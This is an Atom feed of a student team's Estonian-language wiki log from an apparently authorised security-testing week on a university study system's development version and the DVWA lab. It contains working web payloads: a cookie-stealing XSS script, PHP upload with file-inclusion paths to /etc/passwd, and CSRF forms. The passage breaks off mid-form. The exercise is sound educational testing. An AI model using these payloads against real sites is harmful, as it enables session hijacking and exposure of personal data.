<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.itcollege.ee/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Mallikso</id>
	<title>ICO wiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.itcollege.ee/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Mallikso"/>
	<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php/Special:Contributions/Mallikso"/>
	<updated>2026-05-06T02:06:36Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47156</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47156"/>
		<updated>2012-04-02T09:25:01Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* Arvamused intensiivõppe nädala kohta */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
Nädal algas kell 10.00 ruumis 314, kus tutvustati ülesandeid, mida on võimalik valida.&lt;br /&gt;
&lt;br /&gt;
Meie valisime ülesandeks: &amp;quot;ÕIS arendusversiooni turvatestimine&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Meeskonna liikmeteks said Urmo Lihten, Taavi Podzuks, Matis Alliksoo, Alo Konno ja Sander Saarm. &lt;br /&gt;
&lt;br /&gt;
Tiimi nimeks valisime „Security team“.&lt;br /&gt;
&lt;br /&gt;
Pärat teema valimist andis juhendaja Margus Ernits meile juhtnöörid, kuidas oleks mõistlik tiimitööd teha, lisaks andis ta ka lingi mille pealt oleks kõige parem õppida:&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
Jagasime teemad ära:&lt;br /&gt;
&lt;br /&gt;
::A1: Injection - Urmo&lt;br /&gt;
::A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
::A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
::A4: Insecure Direct Object References - Alo&lt;br /&gt;
::A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
::A6: Security Misconfiguration - Matis&lt;br /&gt;
::A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
::A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
::A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
::A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Igaüks tegi selgeks enda kaks teemat ja päeva lõpuks kandsime need ükteisele ja kuulajatele ette:&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Media:A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Media:A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Media:Security Misconfiguration.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
:1.1	Tutvuda OWASP’iga. &lt;br /&gt;
:1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
:1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
:2.1	Esitada tiimi tegevusplaani juhendajale.&lt;br /&gt;
:2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
:2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
:2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
:3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
:3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
:4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
:5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
=== Fireforce plugin Firefoxis ===&lt;br /&gt;
Tekitatud sai ka password list faili pass.txt.&lt;br /&gt;
&lt;br /&gt;
Kasutusel oli Firefox brauser, kuhu installisime plugin&#039;a Fireforce. &lt;br /&gt;
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .&lt;br /&gt;
&lt;br /&gt;
Panime kasutajanimeks &amp;quot;admin&amp;quot; ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.&lt;br /&gt;
&lt;br /&gt;
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud. &lt;br /&gt;
Selleks sai sõna &amp;quot;incorrect&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Määrata ära tuli ka, et mitu päringut sekundis tehakse. &lt;br /&gt;
&lt;br /&gt;
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada. &lt;br /&gt;
&lt;br /&gt;
Päringute tegemise kiirus vähem kui 1 päring/sekundis.&lt;br /&gt;
&lt;br /&gt;
Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.&lt;br /&gt;
&lt;br /&gt;
Kasutasime ka videos näidatud &amp;quot;@ DICTIONARY&amp;quot; teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.&lt;br /&gt;
&lt;br /&gt;
Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Burpsuite v1.4 ===&lt;br /&gt;
Burpsuite v1.4 on Samurai WTF&#039;il olemas juba sees ja saab kohe käima panna.&lt;br /&gt;
[[File:Bp2naide.jpg|250px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
&lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Seejärel mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
&lt;br /&gt;
Kahjuks ka see rünne ei toiminud ja ei suudetud parooli välja tuua. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega aga edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldustele, et Pitchfork meetod kasutab tegelikult meetodit, kus ta paaritab mõlema nimekirja kirja peale järjekorras samadel kohtadel sõnad, millest polnud kasu. Oleks pidanud kasutama ClusterBomb viisi aga meil jäi ajanappuse tõttu kasutamata.&lt;br /&gt;
Samuti Brute Force ründeviisist polnud meil tegelikult kasu ja ei aita eesmärki täita effektiivselt ÕISi arendustestimisel.&lt;br /&gt;
&lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5 sekundiks sisselogimine ära vastava teatega. &lt;br /&gt;
&lt;br /&gt;
Lisaks Brute force programmidele ei tule sealt vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== CSRF - Cross-site request forgery ===&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine. &lt;br /&gt;
&lt;br /&gt;
Rünnatav inimene ise paneb meie tehtud veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse sealt info koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu. &lt;br /&gt;
&lt;br /&gt;
Seejärel saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud väärtus.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Reflected Cross Site Scripting (XSS)  ===&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Faili uploadimine DVWA (Damn Vulnerable Web Application) näitel ===&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
[[File:DVWA_upload.png|250px|thumb|right|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev - Dev-ÕIS&#039;i turvatestimine==&lt;br /&gt;
&lt;br /&gt;
=== Acunetix Web Vulnerability Scanner v. 8 ===&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus: [[File:Tn Acunetix1.PNG|250px|thumb|right|Seaded]]&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8 &lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.&lt;br /&gt;
&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
:Cross-Site Scripting (XSS)&lt;br /&gt;
:SQL Injection (blind test)&lt;br /&gt;
:File inclusion&lt;br /&gt;
:Code Execution&lt;br /&gt;
:LDAP Injection&lt;br /&gt;
:Cross Frame Scripting&lt;br /&gt;
:SQL Injection (error msg. test)&lt;br /&gt;
:CRLF Injection&lt;br /&gt;
:Directory Travelsal&lt;br /&gt;
:XPath Injection&lt;br /&gt;
:URL Redirection&lt;br /&gt;
:Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur sai pärast 19h skännimist, kui oli tehtud ~9% skännimisest see peatada.&lt;br /&gt;
19h skännimise tulemus oli:&lt;br /&gt;
25 High alerts:[[File:Tn Acunetix.PNG|250px|thumb|right|XSS skänni tulemus]]&lt;br /&gt;
HTTP Parameter Pollution (24)&lt;br /&gt;
Weak Password (1)&lt;br /&gt;
&lt;br /&gt;
251 Medium alerts:&lt;br /&gt;
Apache hhtpd Remote denial of service (2)&lt;br /&gt;
Application error message (244)&lt;br /&gt;
URL redirection (5)&lt;br /&gt;
&lt;br /&gt;
6 Low alerts:&lt;br /&gt;
Apache mod_negotiation filename bruteforcing (2)&lt;br /&gt;
Login page password-guessing attack (1)&lt;br /&gt;
Sensitive page could be cached (3)&lt;br /&gt;
&lt;br /&gt;
21 Informational alerts:&lt;br /&gt;
Broken links (18)&lt;br /&gt;
Password type input with autcomplete enabled (3)&lt;br /&gt;
&lt;br /&gt;
Kuna esimest skänni ei saanud lõpule viia otsustasime teha ühe kategooria skänni.&lt;br /&gt;
Skänniks sai valitud Cross-Site Scripting (XSS)&lt;br /&gt;
See skänn kestis 3h ja selle jooksul saadeti 61461 reqesti&lt;br /&gt;
Skänn tuvastas 742 high alerti (Cross Site Scripting) ja 21 informational alerti[Broken link(18), Password type input with autocomplete enabled (3)].&lt;br /&gt;
&lt;br /&gt;
Kuna tegu on automaatiseeritud programmiga ei tähenda, et sait tegelt nii ebaturvaline on, osad asjad mida programm nõrkuseks loeb on mingi põhjusega lihtsalt nii seatud.&lt;br /&gt;
Skänni tulemuste kohta on raske mingeid kindlaid järeldus teha, kuna igat viga tuleks analüüsida ja määrata ära reaalne oht saidile.&lt;br /&gt;
Märkida võiks ära, et iga veebilehe omanik, kes on mures turvalisuse pärast võiks kaaluda selle toote kasutamist.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Failure to Restrict URL Access ===&lt;br /&gt;
[[File:PDFHinneteleht.png|250px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed lisati sellele lingile url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
Proovisime ligi saada ka teistes kohtades lehtedele, mille õigus polnud, aga kõik olid kaitstud url&#039;id.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Subgraph Vega ===&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|250px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|250px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Wapiti ===&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud kasutada HTTPS protokolli kasutada. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga===&lt;br /&gt;
====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|250px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
